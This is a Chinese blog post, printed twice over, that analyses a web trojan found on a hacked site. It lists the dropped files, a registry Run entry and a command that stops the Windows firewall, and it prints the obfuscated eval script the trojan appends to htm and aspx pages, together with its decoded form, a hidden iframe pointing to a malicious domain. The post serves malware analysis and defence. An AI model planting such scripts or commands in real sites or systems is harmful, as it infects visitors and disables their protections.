解读网站被挂其中木马分析js+eval实现
2007-03-31 00:00
651 查看
在FF看到这消息.. 于是就把网页解开了..
原来是"老朋友"刺客集团 .. 已经多次和这个集团生成的网马打交道了..
其中挂上一个木马
hxxp://www.es86.com/pic/ddb/2006692151148920.gif
就此做个分析吧..
运行样本.
释放文件
C:\win30.exe
调用cmd 运行命令 /c net stop sharedaccess
访问网站
61.129.102.79
地址应该是:hxxp://www.es86.com 80端口通讯
下载:hxxp://www.es86.com/es86/db/dvbbs.mdb
此文件为rar 文件..
dvbbs.mdb 释放出文件为
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe
写入注册表
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe"
在 htm 和 aspx 尾部加入代码
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>
解密为
<script>
p="<iframe height=0 width=0 src="http://a-l.meibu.com/"></iframe>"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>
在线扫描
AntiVir 7.3.1.38 03.02.2007 TR/Crypt.NSPM.Gen
BitDefender 7.2 03.02.2007 DeepScan:Generic.Malware.PWYddldPk.D212BB22
eSafe 7.0.14.0 02.28.2007 suspicious Trojan/Worm
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader
Ikarus T3.1.1.3 03.02.2007 Backdoor.Win32.Hupigon.BV
NOD32v2 2090 03.02.2007 a variant of Win32/Delf.AG
Norman 5.80.02 03.02.2007 W32/Downloader
Panda 9.0.0.4 03.01.2007 Suspicious file
以上分析都在虚拟机里完成的..
这次加的壳实在脱不开..无法查看更详细..
不过猜测 编写语言为 Borland Delphi 6.0 - 7.0
尝试关闭一些安全软件 估计也有..
=.= 再此感叹..这什么破壳..
原来是"老朋友"刺客集团 .. 已经多次和这个集团生成的网马打交道了..
其中挂上一个木马
hxxp://www.es86.com/pic/ddb/2006692151148920.gif
就此做个分析吧..
运行样本.
释放文件
C:\win30.exe
调用cmd 运行命令 /c net stop sharedaccess
访问网站
61.129.102.79
地址应该是:hxxp://www.es86.com 80端口通讯
下载:hxxp://www.es86.com/es86/db/dvbbs.mdb
此文件为rar 文件..
dvbbs.mdb 释放出文件为
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eCompress.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eImgConverter.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\eLIB.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\HideProc.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\internet.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\krnln.fnr
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\Nhook.dll
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\shell.fne
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe
写入注册表
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe"
在 htm 和 aspx 尾部加入代码
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>
解密为
<script>
p="<iframe height=0 width=0 src="http://a-l.meibu.com/"></iframe>"
p=eval("String.fromCharCode("+p+")");
document.write(p);</script>
在线扫描
AntiVir 7.3.1.38 03.02.2007 TR/Crypt.NSPM.Gen
BitDefender 7.2 03.02.2007 DeepScan:Generic.Malware.PWYddldPk.D212BB22
eSafe 7.0.14.0 02.28.2007 suspicious Trojan/Worm
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader
Ikarus T3.1.1.3 03.02.2007 Backdoor.Win32.Hupigon.BV
NOD32v2 2090 03.02.2007 a variant of Win32/Delf.AG
Norman 5.80.02 03.02.2007 W32/Downloader
Panda 9.0.0.4 03.01.2007 Suspicious file
以上分析都在虚拟机里完成的..
这次加的壳实在脱不开..无法查看更详细..
不过猜测 编写语言为 Borland Delphi 6.0 - 7.0
尝试关闭一些安全软件 估计也有..
=.= 再此感叹..这什么破壳..
相关文章推荐
- pjax:ajax和pushState结合的js库——实现网站无刷新加载页面
- JS实现带关闭功能的阿里妈妈网站顶部滑出banner工具条代码
- JS实现带有抽屉效果的产品类网站多级导航菜单代码
- 优秀开源代码解读之JS与iOS Native Code互调的优雅实现方案
- JS数组搜索之折半搜索实现方法分析
- Node.js-实现高效采集网站内容最佳工具
- js实现:点击一个按钮,弹出一个div,并向其中传值,修改后,再传出
- JS实现BASE64加密解密-后台加密前台解密案例分析
- JS实现图片转换成base64的各种应用场景实例分析
- nodejs+express实现文件上传下载管理网站
- 用.net实现远程获取其他网站页面内容!(核心代码分析)
- js如何实现网站内容禁止复制和粘贴、另存为?
- 淘宝网采用什么技术架构来实现网站高负载分析
- 优秀开源代码解读之JS与iOS Native Code互调的优雅实现方案
- js实现倒计时 类似团购网站
- 电影网站增删改查-4 spring boots/MVC/neo4j/thymeleaf 源码分析 实现View 新增过程
- 用JS实现网站的繁体简体版
- 用.net实现远程获取其他网站页面内容!(核心代码分析)
- js实现跨域的4种实用方法原理分析
- node.js基础模块http、网页分析工具cherrio实现爬虫